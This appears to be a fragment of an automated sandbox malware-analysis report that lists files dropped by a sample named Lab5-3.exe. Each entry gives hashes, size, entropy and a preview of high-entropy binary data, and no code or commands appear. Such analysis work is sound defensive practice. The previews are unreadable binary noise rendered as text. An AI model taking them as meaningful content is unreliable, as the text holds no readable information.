                                                                                                          SHA1:77F1E25F84A26C9365AA5B9186879995F93F7977
                                                                                                          SHA-256:EBA0A6FCCADF74BF6DCAD79557C200D4A108D767777B58728D7D0B333A2535A9
                                                                                                          SHA-512:603A8A0ED6A8069827CC161B8F01BE4BAFEA4481280B37B721ADB888D65A51239579F100610B553D478E2865F44CFE5D34F40273194EAD1866E8BEC89AB56370
                                                                                                          Malicious:false
                                                                                                          Preview:.....SR.J..}W........X...h.....SS..F..u....a.K.m).:...\..d..(a.B.h.F..;c......T.=+.i..4...f.T75....zO.S.e....j.q..7F..o.Q5.w.4....s.U....VD..g....Z...J.zP.k...u..|...d:....n....O..h.....r.[\.A..(..)....9.@..$..O*...SUm....$............oC.B.9.o.......Z\...H.......e..M.S..Kw@e.F..Y#.C./...q....|.V....r....eF..b..Tv..P*.4.G..D.!.]........x.S.....iQ}..L.-....D"j^..x.Yku....=.*...G).x.....;.(.........d...>M...w69....8pB^..s.s)c.. ..p...dJ...41..+e.L...1?.\a..n....b..~~/.O...~q.....rj....X........Vz......p.b.......f..."..56.=.I....\..G...h......x.|E.}.....m/...-P....0(./&.DP.._.7C.~..n.].. ..j.;..........T.6..X...@ZG.U...:...I?G.....J8=.$..[..Q_...8..+L..%.ug.....o..Q...Z.(;..{./..{..Z7TI.N..^. Z.U....L..s..9..\.\.Lg...R...T..;..:(9.*.=..........6%..}U..(...%.N...P.&./Z.Z...6,.E.x..}..Z..E....cL.!z..?...;VO@..g.U.8A.>O.<....WE!S....>...VV..H.B......>.UKfL...}Z..Q..P5E........\....V...D..-.l.Q..R.y.JM).z.V- .....,.........G$(c....d.F*..Rc!
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2272
                                                                                                          Entropy (8bit):7.923470871777324
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:kRrOJ5qdLUDulzhggHfUTid3hBaUoSGFcmeykEdEElU92i:utd9aGx0uKeY2ElUJ
                                                                                                          MD5:F6D606E43E16C62879532A2B97D2F774
                                                                                                          SHA1:9BC9E10E35BF81EBD96A41BF058D7BCF7DA21379
                                                                                                          SHA-256:5284E8C557190FA0EB0F473487715D1FB10DF75CAC9F3CB1C2C72155264ABB27
                                                                                                          SHA-512:C40F86CFA7CA1718D2E458278F0A4C020DEEE5B20148CCFF45282167A454F498E80137227F51E907A5AF083270B6EC5D9B12049AE9D759678D5FF651B13CFCED
                                                                                                          Malicious:false
                                                                                                          Preview:Hx.....@..<.....~..TS..n.8.5...H...3K..{*..:...-g....E.v..d..4..1.4.'.U..A..}W..,......Nc..!Y...9..y..]..p.U...R...HOsNH.*...-..(..4%.Ze..".`.....Y.[..H.............$Ai'pd..b1.DVs..V."m..a...:..%.o7.x.....@...<e ...n].......i-.....Y..p..y..w.X$R#.Be/....5.h.9K`.......P-e...F....,..R.8...z.|.T.6.....R..M..U!..i..D.^....w.v..!&.r...e.L..y`3t...K./.<=Z8...5.L.y...S/.Nl...'Ox.cCe....>.h..G.q.%]IY.........~.M....x..G...@K......c..B...i+........Wb..y.. 5'......4*4..'...[.]~..szp.q.h..!.lG."j.H.~$..OB*..8.qYm..*..y..So..1J}.l.c-.....6F.......)}.z3.~.J.^.+.R..-.bR.......F"`...A.UR.oXA}....O.:".>. O.A.mGa...#D..3...B_:L".........w..c.....h.f.V..m.NM.Z...u........T,A..h..n....\......LQ..;.........XW.Q6...W..8....>..xG..sN....i.s.".B...<.ny..q...(S.H...p.....{....L4Ir..4A.-.vF......v....Z...d.w.n.X|*..|yi,.j.e..k.&..._....wh..Q.^....C>....sP7.F..3.............sn..v.......jy@!|..........%.d..9.....p+........S._H.tU.....u....^.Q...rp....;....M
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2992
                                                                                                          Entropy (8bit):7.937943379449337
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:i8lARA1wUaXoaJ9S62jzbkwGud7Isx+A2p4AvG3ZHfUTid3hBaUoSGFcmeykEdEb:i8yA1wUaXnXS6abGE7FZ2v5Gx0uKeY2b
                                                                                                          MD5:C1EFD96E2F51599E2334CBE35D068675
                                                                                                          SHA1:8FFE6780699291A783351324E8D0A4091AE24B9E
                                                                                                          SHA-256:194BA723355504716CE0EF1DDB60B18F072CF8166F3FBB0010B0E564221E4C05
                                                                                                          SHA-512:554B97DD5AD2E3A79A728FFD5FBF5B0B379BCA788E2CDAB0743DEB1B4970E0C89A52DF41811EF810B62C8A37D072C3DFE2BD519EE6C9C791E64A674E530365B9
                                                                                                          Malicious:false
                                                                                                          Preview:4....~..W.2..'!..w.[3.....F.B....VL.U..v.`...[.5'o.2...\.......HF.m.!..........DM~h1.%...k..........[.....%nT.cN.r...xy\:.Tp.f.....f...Y.&A+{ku.ALHQ..0.V.;..7}....R.x...O...D?.i/.TE...,\.B[)e....Pq..Z.}M..X.....9.?.R.......]............4^.....i.F-%...&...>+.-.......q....M...DFR..n:n#+Jb....A.. .m.....'~||m&t.g...7h......!...*].Y.4c.f......f.a....1.c.c.x.....[.T.:.z..&.....?.~l.%z..6&0..`....z..:.f.Xe/Q$./.......y...g.B...<....f..@...d.....l.C.+.9..0A....r.`UI^..l...>|I...f..:D..S..)en..w`.....U.H..fT..Q.GbJ....=.=(..%...{.J.s..}.Z]..sd>}.g....W.....A.V..z..TSb.9R9........+M...et..m.{...#..?.r.D..v.F=..j\...t>;.er....b........I.....=....@.X.#....(...A....W...*J.....j}.EFFq..'V)....)n.*L..e.......S.WCoN:......;`H.@...A.......].w..n.{.]..j..=.........".WS9.$...m..i0...?......Bn..c..#!....x/..]>2.E.Y.................n.F.x. Wz4|K<..8....4....R<......xq$Px......A.i^i.!.r1....h.&....=....~..=.. ..../.'.*|Az.!X...O.4..1.c..f1n.<.Q@...x....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2272
                                                                                                          Entropy (8bit):7.928771880398948
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:VER61F28j2g6B8rdKiIkjHfUTid3hBaUoSGFcmeykEdEElU92i:fFjuTGx0uKeY2ElUJ
                                                                                                          MD5:818331A855A8645D6AA992EB34E05A1C
                                                                                                          SHA1:E1FB951E55E9BC7239DD7464BCC4AB5B662B5076
                                                                                                          SHA-256:236FBA54E03E3B9B8C590618F0D233A454F9216CBD2B31B7BBB9E6B7175B8CC5
                                                                                                          SHA-512:1A9A02B1AE75C473E5112CD775399498FCA8509E26E2AFE5AE0B60EBAED56EDBC5C8C85DC91620EDC1A26B707CD0FA0710E6CC0FA73F920F7CEA4E84EA715337
                                                                                                          Malicious:false
                                                                                                          Preview:.hO.........RATnJ.3........s.b...........FM.E.j.!/);....@<..i..J.Zm,k).A.y.L3`......]..r...c~...p:<mL...F.G.....v...o..(.........d..k`C.6......0...}..w.C..r..!)..E.4.E.T.,z.........A..1.b.....v;.;..7%~j...@JB:..j..@...G..@.S.A.C.Yj.....HT.X.^.53fv.....q.XC....Nmj...]......W..1d"....L.;h.....R...7.*.].U.7...k.rx[.9d..Gs..7t./......O....y..R...p.5.o.;...}.._...nB....C..!...M`.{...1L.Q....X.$4.H.@.R.F..Oq..*hu.4a.8=n.@..$.&J.NA..,J.[..v'./.E..xw........S.sa..S.A.....{.b..z.}s..P.=I..rZ...b..)..#.LWMT....k.[..LQ@p.....l.#...%...1...Pp..u.\e.yI9.u.....N....w...+}l.K.M...hL....MD5Oo#..{...=..o..I..g=[..q.Lk...k5[..q...I..).&dHZ.yO...I[..I-..^........(8.0.<....T...h.,..<....e......x..6..g.do....'......#$.VA_......0...{..z...kP..W.?F....h.cxqi...@+y...]1....t..X.XFN@..e.....V..*q.@@...4;w......[@....u......^.....e..m..=:f6U.....6...X.=...@.O.Q........T.p.I..<n.....5.M.. ....w}....!..bD...C`s..%b..e...c..#....j..v."GC.....^.Q...rp....;....M
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2576
                                                                                                          Entropy (8bit):7.9191485850192125
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:jrGxU43WK/lgorjdelZ56tL7HfUTid3hBaUoSGFcmeykEdEElU92i:jCPdlVrRelZ1Gx0uKeY2ElUJ
                                                                                                          MD5:CDC0CB0E25B937559A092AC63410BD94
                                                                                                          SHA1:FFECE01387C2359FF84DB9CEF310C910488637E5
                                                                                                          SHA-256:265B500B8B2520AC62324C59D926B55A48CE6ECC294291CB22FB66893C8C17D2
                                                                                                          SHA-512:EA182D100919E0A9DAB2F09948483303CE1B24D9F5E8443A713D5DD2251BACD471D668B096188E58B966B3C38D1BADCEC88502688D596E12887BD9EF15760B6A
                                                                                                          Malicious:false
                                                                                                          Preview:o....n..-/MTW..[..i..Bv...}...2....ha.I..R$........ ..5...V..g...YU...G....s}o>.....$T..........D..Lk.|.'~..fW[E.l.(..|;.C........X..u.2..lgj............1.f:M.u&.E...~"H}/..-...Q..U._B....1.r/.^.-~|]...j..8....o...*.-..z;%0;.Uj...+.G.]rm.(...u........0.mM.8..u..S.........J.]u.0...`B......jrR.._.^..L.'.....1wjCWo...G.,..W-.X...jO.9....I.LM.1/.E...N.V../B../N....@E.....B|..]...H....4F[.v...%.]Zspa.N.>.....]..........=..{...M;K.H..{%.-Eo......0c.<P5.@.{.&..+........$Vg.e.y...RN...h. *Zt.&q'.iz(..:.>..9...7HY...I.x.1WE.1N.Ykx.3c`.......Q..G..eW.F...M].4..).7.V..5...z.p.r..K\...+F..!....!~.......*l...TlR...[0.}..8 ....5.R...8..]....M.p..o.o&4...z?.....#.....t...B=H/....5...x..Jg.. ..&"7M.G........X..&.AD...........SV...E........0`..r.G.>..<P.yC.P(6..z|.s~.0.\....,.2t..e..%S.~..N......[^.=..F...-.l....#..R/..Q.x.0..o....'..5.!f.".z..qv...<W,*...bT././)".{w..-,H..f..!..5..\4W...^.C$b.Rq.;..b>j&..|.YG...UB...b.|..61<.o.U......v[.fIW.)......J...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3184
                                                                                                          Entropy (8bit):7.938219492373987
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:DUwDXUCPUrmzOXQQwQ7Ml9eyErLcwqHpHfUTid3hBaUoSGFcmeykEdEElU92i:DUeXRPimzAHDGx0uKeY2ElUJ
                                                                                                          MD5:8EE929ABC300FBD7C0A855E5CB437C3A
                                                                                                          SHA1:6BA4AB8A22AC417DD922DE3175D17455488379ED
                                                                                                          SHA-256:C103B01ED2E2C28D2F9FCD99617FF5D6E5C64FEBBEC6B0FDC821420ADC3C1B64
                                                                                                          SHA-512:41BE76A2BAFD6DFF0AC236F7238EB1EC1F8FF360E557C9D4E0647E85BA00DA445B3A133D2F78D5FE6CFFE6826AC8639EF85236C6758F0DF44076E9B086E9841D
                                                                                                          Malicious:false
                                                                                                          Preview:I.P.X.r..Z...Y|0..<I..2.$.F>m....L...O.d.R..5.>.N;........Q..:..3....O.*..m...2.........v.H~.2..;..|i.....[...,.._mQ..BB ../~9.\I. .|..1./y...fI&ciu.3.s.x.D.s.n..o.6..\.A-N......(F.GE...F....N.P....a.J"....YaW.b.............N....i........p....l..H.,.L...F..Y9B.Pc"..(..(...k..6...r..G...b..>F.:B#&.....}b.X_.q..4..]......2.Z....|2yK+.w....EO4 .j.......z.GxMK.u.M....'..$..qS...r..{..#!5.....,......".:mOEB).........F.K.~j..M.a.|_Y..}E.b..$gv...ApW....9.R,...i...?...)r.g...).RTR.!..2Q.c.'..SG`........-=..['........$..F..`.Q.rx..MH+o.|J.eGH.6zh(g.X2.r..........gO.km.!...i....%u....>.....-....Rn..Q..3.B..]........V.1..V..K.yp0..z.lWA.....y..s9V..I,Q...{\.....O...d.%...n.0.TN..R..^...J..&t..m.b...~.Kp.A.#..f3.r2{...O"..*....v.. ...{C..@.Xa.w3%.V.*.%'qX...?...H.U....v...7.....45}.............W.(......lA..l..]..!....,}W..O../b\B..I...X.r..P..H.....!R.}J..r....3.a..8.t.A..?&.Zl.c....T.4.76.~.hxM..%*B.W.PW.?.I.!.K.....Sik.fuSR.KB)......2YX.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3200
                                                                                                          Entropy (8bit):7.939585803242507
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:JyRLpRnkTXIwmm/NLmca2oh/rf1Q6K/AjHdXHfUTid3hBaUoSGFcmeykEdEElU93:ATRnkXkmeJQ68AjH6Gx0uKeY2ElUJ
                                                                                                          MD5:2AB83243E11FA1D1D839879714BFC36C
                                                                                                          SHA1:769002B9616B788ABB3B681EFBC8E4F454680933
                                                                                                          SHA-256:641442BFCE73E05811F8703060DAEE647012CC6D22E96712E4F0515A96D7E2E3
                                                                                                          SHA-512:8F090CE44DF8BA1D78F39F65AFBCCC9CEF90F374FCFE0678C9B103E80AFACA617A499CA4379565753C406C4367988CF5EC2D60D74705D5A96EB02660F4517376
                                                                                                          Malicious:false
                                                                                                          Preview:". @SO...n??y...Bmd34..!....>..........uNF..b.v....4.=...[/.|..z..U....7.../Pd.?.7...tR...I...hP....V"l.)@0).:..Y.?..?.2xa.Wi.j..G.D...c5.&.58....J..[.O.3.nJV.z. ......o{?d7a..<../~c.wg....\.j7.=m...J........Y.1[>...u..sv..)...I...B..mq.Va...t.s.}....>2.N.Zk.@$p;<S.).B#l....T...z.H4W..\..1.|.6..+...D@ZUK...1....-..&.&\...(.%.v.m...wJq.w.z&b6..1;e.l^l|.I..Yo(5.Q"....E+...p..e.g..E.iu...d$......D6v+.r.)r.......M~.F..3..N......?6.E.KR.}.]X.E...<...a...h.t.m.I.'7...Yk...{..-.....)...I.mI..>.u.2m......8.)Cj.M~....g.xa..K..%(.(r:v..... .......$...$....Tq*Q......../.B....0l.`5...8kP.......6p.y.k4Y.a`.YDU)(h..lP.v.H....i.@.>.....{f.<B....J4..N...IV....&r......J...........[ZA....X....V'.3a...5..Q.[.|.).b(..r6...9p...?..?..D..d..........2..2....=.e...9.7.[.@n.6..i'..-..[2.[...l.{...6......'.....0....4?..F...s....B...q...H...#..ACMR.5.dDF!...X.,.YK.sr.."Y.-i.H3........I...~\.....P...D...%.n.J...........9,a.u...ti|..-.4.a....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2656
                                                                                                          Entropy (8bit):7.923450520293207
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:xUgsIphJoMPFgWiLYpGJwbg25vz/mNxlrVuEHfUTid3hBaUoSGFcmeykEdEElU93:xrxp5FgWFp4w9wraGx0uKeY2ElUJ
                                                                                                          MD5:3CD2CD96BAD610C7BF11E0B08CC032A1
                                                                                                          SHA1:C5FF8E33519F0C5B2ED15B2A2195AA031879CB07
                                                                                                          SHA-256:ECABAAC63D3D87931A2AEA4951BA9CA1FAB05B06FC26EE406A334E6E29B8BFC6
                                                                                                          SHA-512:E67AA62FA4A03C3761AFD97D7F3D11C86A14BD76A89ABF43E426C98E0C1F7C23FA5002712D0E35A922625FAE6F322EF49112EA7037456BA7DA71EB1BB029B374
                                                                                                          Malicious:false
                                                                                                          Preview:K..e...2..M6..$C(..@\..?......=".U<....].......<.:."...GG.w...A5..p.5..N*<U.../..,W.'....u.$.........E....;..*'.~.)..i.T.0p....(...;HQcf...R........7....).-..98de:.9=.gi.X......-.:.....ucG.N.}.p(}a.U.Q2..oX.s..3.J.....).ZX........#._n.......,.....|Qc|...G......90...|m..n$._tn.'5.;C.v.(,..7.O......s.....a...&!..'..W..).5....n.E|%U....%I...C4I...#P.k..DG.\...0<.OQTu.Y.Cn.....!...%f'..+.L.LDz .w/2.L|..F ..4.v..T.t...|(m...3.[0.Y.+..x...D....4...H2{B.i.'.......oT?..@[C3L..\...9.....R.c"....?W$65<}...g..c..3sQ?.....).S%.2z.C.Gm6.+8Y..F....JY.....Y.XJ....../4L.....`.]DC>..{.....9.b....J.p.;.%.......3..].M.H..........Y..)*$..........o......bh',.H...V..A.4..f\.....r.^r.Bg.A}..u7.z..;..w...-4...O..e..3S)..D.8...&.........4.xus1.l?._B.v. ..j....v...+~...u..x4..4........._])...R.%..o.p..`.l%...[ .lU..U.K..P....w......_.p.KO.....*.xklk.._\...E..........@....U..!)).xFP_.zmA:.C..4+FZ....D.P,...C$...`c.....=3ww...R..G'~..^...w."........
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1984
                                                                                                          Entropy (8bit):7.894698914560784
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:v4TeLLQNZ4f3up9pHfUTid3hBaUoSGFcmeykEdEElU92i:SeHQT4mp9qGx0uKeY2ElUJ
                                                                                                          MD5:F4A0BF72DBB865C1359E1D4EFCBE9B7F
                                                                                                          SHA1:9CB7E3546E0D58039AAAC0049F44E7CA9F4ABECF
                                                                                                          SHA-256:CEA18E97817101AE83B2F98EAC61EC347C4F450B1063AC30381A4939472C2D42
                                                                                                          SHA-512:F9691BC6C78F56670567C0DA48FA2BDAC7F9BB846C246090B21FACDF1CFBB80653D6F9BB03E4D3C1D459E6D7C446D8AC734C04527E5D7172CD854CAFC69AE143
                                                                                                          Malicious:false
                                                                                                          Preview:..$UM~.s....P.8V?.N......K...g.Ka...n.4l.............lk7..u...r...[....#..^..K+.....'~.......n_.......g..(Sn....X.....5........a"@".....(......`..H....g...t.YJ{.....4...:...6.>.......7.-o.`.tW&..l....[.u$..5!........^.a..i{h.R.9...A...j.".B,+..UqV.Q....1.!..5....w.$......-k..*"=...M.F^s....9..E.W...n..A.p.f....:... K.:^...k.....9.1]0@LeE.5...i.4p!....0..%....p....S.F...y..E..C>..L.ba..b.;^$.@M...~.F....,c...#V.G.p!.va..>...D.Q....}+(...,.f99:..^2.v=...)..jtT.}o....y.....7....J~.D...t..b......#...../..........0E........i.......?}."....@J+.F.E..M.(u..`..../.`..Wj..pv.:..W..F9.Q.?d......d`./S..N'.Q.....4.o..\Rt.Up.=.;.W... .h.8...E.Cf.`..`jjxD5..s..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2336
                                                                                                          Entropy (8bit):7.923077272158068
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:y2fFtdTjnT98vOaUsbC3qJJlMDHfUTid3hBaUoSGFcmeykEdEElU92i:yAtjnT98vfC45Gx0uKeY2ElUJ
                                                                                                          MD5:E14104FFFE7227EF5498F0CA1D20D6CB
                                                                                                          SHA1:AA37B0C3096042E0547CB3C62068FC994F585B38
                                                                                                          SHA-256:6A584B8736B3F339602B57BFED90736A1AE1C6B10DE12A1DEB451A7555EC6677
                                                                                                          SHA-512:A304CB374002E2AD4DF496A9402587837D8F671E50F1AFB643D9F4272CC85AA26AC221BB0A26CDF42A24C7F51DC7FADA9CD4CE9E283D83576422F09668E02856
                                                                                                          Malicious:false
                                                                                                          Preview:..7$)s.le)..s;%....x..X......~..,.vZ.[..4.{.C;..j.l5.drt.'..s..K...t.I....'..MZ.K....L.0..,0...Q...C.C...PM.......%3..bH....<!.<.@....7l..+..1,.e..U0`|....r.B....A9.f}.MK...........a.29..6Z....y....F....Lh ..0|...K.....]....]t.'....>.*..@d....s....6.?..MR...E.a..i... ....=.....=..S.g.^}..._....?..hG...v.'..E,...^.......N.=.}.vDI..S"w..FY}.:..E...cI......L..l.cr.g..ij.{....T..h.....g=.^...9..........YX.l.!)..c.;.5_.E.H.H.:.y.U.l&.....`...j8_...p:/..aL,x\u.p.\.....]."s....~....t.-....lE}...L.C.^nBg..g_Fo.....0...jG.>.......t..... f.np<. ;..C...{aSGq.....K............a....I......>.G...Y.8;'....=..jQG......1VF.....7..1O.8.v.$.B,r.j.@.nmC..m..5...xU........../[mX.N...+.SV..Z..-..2..+.;.HsyZ.RZ..$,n.j..#z....8w.....`.......X/...........<...R..M... .M..j.s.,W..8].*9e....rL..(..sYiK!.u@...l+..E,J........q7.i:..g...,{].v..|.S-.y.Q..m.fbH..Y.u;=.;S.`.:..5O......."..&uQ.[{.7...fYOb.x.....{n...0...B.;W..Z.l......t.y.l1.)4..7.R.?.....f...t,..7+.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3904
                                                                                                          Entropy (8bit):7.954797143996818
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:qB9Ft44+7m4JJVYT8Yqla13/vQINkr3KfGX3b3XDgApq3IOFrHfUTid3hBaUoSG0:W9ggWJ+fKs+MfIPGx0uKeY2ElUJ
                                                                                                          MD5:71A8D0B754509BB97ACB585DA140A885
                                                                                                          SHA1:3B4CA6A5689CA92E6C76CE650AA0BEBC3E946DE8
                                                                                                          SHA-256:2498A1D3FC9C49F7A6B8612B7B4F9CBE8ED84F31A64179470581B72346347E64
                                                                                                          SHA-512:EDE8048D22CC63C60B275D0C68A2388BF793D11814E8925C91CAEB6BB9EDE3A48F4DB428214FE2139832BC29D806377FF6A8A873A5972AA207F8CD3202DB37CC
                                                                                                          Malicious:false
                                                                                                          Preview:.s.]].....9..}8..RQ6+i]'V.$N...........k..F.rT.~e"[].d...\.[]a..N.5.2...V..P..b ..(.2Z.'...lH.n.$..W..=;o.....N6~Q(.g...>..x7....-.g..L`..L....}g....P.".l..*.........m./..`w..B*6....9...\V$.U..fg.c..b".;d1<....=8.(....C..0^.....*..p].b..@..=z.T....:i.\....1[.z.^`.,.....Y....NE..h.k.(I.....0.2P...VSWwH.....,.(........h0....C#..W..A....u.s.....]...i#..O...8m3U.!".dr........mbj.J./....t...Q..hK.[......F...A...e......g.G.#.F!N8.D./X.Y.T.";.3..S%.l..}.nB...L!1.V8;[{.y...K......m....v............{.....Q.....jF.......C.....f.$......f.Q...i...R...6.....N$Vr|nB-...@..i..d....=...\s.L..G...........brs8.~..>...E2,.......3..P.....4.....F..$.P.1...XA.+...~......l...[.(r......O!K....[..@..N.r....EM..;...Lf.Y;...j...2..I..XQ...'h..@.X*.......s......uJ.i,<....v........Q.`.>iJ.*....?#.x.o..7...9..,...QD.aA.....S!7.f.......P..V...%.......C...*..e...to..$wt.h..C. ....^.D......4?^.|.1...a.xw...K........ja.......E.y..0z..9..E$....i...._g.7..#.;Yq.Xa..0#y.g4q.a.p.dgL...9
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2704
                                                                                                          Entropy (8bit):7.934674872405124
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:X/SsLVvVycV5YItKQxNKlJposiTLE+thYkbLqHfUTid3hBaUoSGFcmeykEdEElUJ:PSOVVyowlJKsvILFGx0uKeY2ElUJ
                                                                                                          MD5:E37826F30A2313C36ED6BB1DCB50206F
                                                                                                          SHA1:324918B3069FB81EDB3CB7990D5751EEF7D822DA
                                                                                                          SHA-256:955D63A6B1306C04A686ED3446E244E5456F21588F4F086E2AE3C5CA44C59044
                                                                                                          SHA-512:A19D92816268028A5BA3C3A199255ED050484E77523771F8A025CFF4F3E0CDC1DD4E111E8D71CEEE1096C10780A3935D6EB6EAD09C3CCA9CDE0F4CCEBF59FDBF
                                                                                                          Malicious:false
                                                                                                          Preview:........P.x.*#]..y.a.9w.....V......i@.....|..I..I.5).4...&.X..;\.........q. M-'U.....=......!E..4M.A.cm^.F..}...:d.c....g...h.#j.~.p..Ud..CL..EB0.;_.E..^.+......N.Ps..a:N8..>...........P!7"......?.K..ro...j[..l..W..u%......5$.nn.G......rqn.j.0..|LF.Q....)B.....W.!v...I"s.W...`..G@)....n....)2N..y1..a.x.^...k'..l..g0..Y.......:.Q.R..e?....(%.zfD......]..j......3B{A.../...\....jJczvy.I.R.....-B..2;U<.3. ..5.E.t~4?XAH...D..pQ}..tn.|.(.n.]t....nC./....S"C&#.D...E...D=.?..D.y5F..>...qaO.R........F.E.!\Z.Q'XDTk..:..:.z..5.,._>...v..l.^.Q%0T.....|.-~.S..9.Z...$M.J]..P$..1O.wY..m...c..~B.:}....-<`?q.o.$.\}%..+....,.%^.\....$_F6o...2..(,Q....r.Q9....a...V.`M...Q..>.../.L2.L..\J...IM.I....e..U......(~21...J........q+.OVY...0.T....i.............3...J......".R........f.."....j.7....9..U...9.ako.......T.1....n.......U..E.2y.9S.....>.Cb.D>...Wh=+.C.....q.....l.E"kj..4V.W._...2...R........[.3...R.s$...V&G6wK..dB.@.9=x&....&..K..5.;f&d...'......4.=*..^*..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11872
                                                                                                          Entropy (8bit):7.9849333084538
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:sZ0f9Gle80mm3ICGt87SmUHXlHxHD43TY9JA/uff1xv2zGdxf9vV+h1S8lyiVqbZ:sZ0f9ASIm7SllHh7yivv2zGdZ9vVM9YZ
                                                                                                          MD5:D5A4185D0B6F354FF3004848D0CECBDE
                                                                                                          SHA1:87540DEB5978C7F01D4C7EFBA3B728FFD46AC05E
                                                                                                          SHA-256:D44FB384F2DA1DB60AE235526037CA5BB1094E64DAAF0AE2F1259E5F38CB631A
                                                                                                          SHA-512:7F523DFA6F54F47D620EC8E8FE4FEFEB4373C2921477D987A11B6A28C56E8270E96B73A1886C294F4F77C9BD5E6C467F5B65A1EAFB40BBBE0844DA8545D81BBE
                                                                                                          Malicious:false
                                                                                                          Preview:R:..*T....~e.$..^.84<0.....pG..D.5.JU.TDW.d.j.%8Bk.\.7.].0z{...&..#Z.X.....h..+.`.1"..{.CI....d...Dc._..9e.7..[.N...r..*.......AlIk.Zk...~.Y..{..W..K. 7<.yv.-B^i.[.......yJ.r0.....\^..[...?.....d..Oaw.X$....F..T.K..f...b..T.W|8..#C..@]....x.f ...JO.......0..W..*l..P=. ..w..G:.mh@3.b&O./v..5.Z..[.$..T ..-..z;..D.e...h.Y.o..Hh......8..{.n.h..._.?5iu,^.<m.."..HM.......]i=./..e.....duCz........]&P,....#".....D.Q3d..+u..].j.!.F.....Z.Z.,z..r....RUL....@2s..l.-@^..;..y......83..>.Zp......./......q..an..i....Ef.NS.A...4..:...&K"(.N*.(2R.rD..|-o=..O...y...>P..uf?.y.R...+"....m)..E....0.D..a.....nz.U(..r..l.C..=..f.P...=.\y_I.4R..KI|.UqB...3Nw.P_..R.m..a..].&j.% .ew,...S.u.Q_.g..PL..G..}.r.X..qH..uD..W..C.,..............f..@y.!..F.....p..7..v.'..a.......r"u....o..h....z..E.B..........6.e[..y...|.>^m..w....^K.m..Kn..;E..d........`%......9f..8J~....x..R60..]..[6......x....iO...V..>.2..,.....[k'....=...JV..b.%.._n..r+..a......vw. ...CWi........]:.7
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):17904
                                                                                                          Entropy (8bit):7.989071050581799
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:NMnSq9RgRM2nk6HjCW99Lzqd723GoIrr0lTzhVhPGapHtb:sgXk6HjZnL+br09h7ZHZ
                                                                                                          MD5:3ED1BADB1FDE4CB174B7684C72377F51
                                                                                                          SHA1:BCD0802F8E77CC64168AF160C755F766CA01E746
                                                                                                          SHA-256:7E3A0713549A0949DDF9F62ADE40B0A17005387545DD1A2853FE28334CB9FF5E
                                                                                                          SHA-512:2A30AAD3C142CCDB111047D23D41516D22C0D26EC34CCCC95C8042C5931999BECF2D7621C208AE57C71B143867636965606F87A5CC47218D32EA442B2E95FC36
                                                                                                          Malicious:false
                                                                                                          Preview:.7G\uc.v.G5.6(..&o....7...?.....|.}..|......l#...`.l...X..E...L.<}.!...=G.FQj..)W.k.....%...E...iq..g...gZ...-......nI.=..`s..s......15\.....&.9!.}....D.........3....?,i....".L..5G....b.E./M..>..w..lk.....U#.....[Z..J..f......P.y...j..x.Mn.=.a.......G.b.q......B.g...G....2.\D ..b..%Ftd....d.mO.......!l.k..C...P5...EO.cV.K9...=..C;jj.u.........3....."...2......C<l.llG...'.I...o..*../*..w..k.....[[..]..g......g.'.Va....P>...#.....`.O..y.%.- D../......X%...9..`E........mL.....nc..j.%..g6...L......w......Q..E8Z...p.Y.+...j..@(.i1...OT.b....|=dC*p.(...".....#....$5...)....1p......VHJ.../H...B..U7.g..Hv6v..?. .XGv.Nc.E.t..~.q.........O...."..}y...z|D.....7.....e..........$..p2@a....t"!e@....."{.E(..%Tm....t..z......d..w.MV....C1...<.....M8.0..O.zjB]1-........./J .n.G......<7];.....<.|.........X."h....X"n.F.Y.#..r..$.-{?:...O..x...C.C.z..8....A..#4.5....?Q[..).V@..f.....~.2#.A|&$.......8t....A..X.../..L$...`......Y5.....q.".
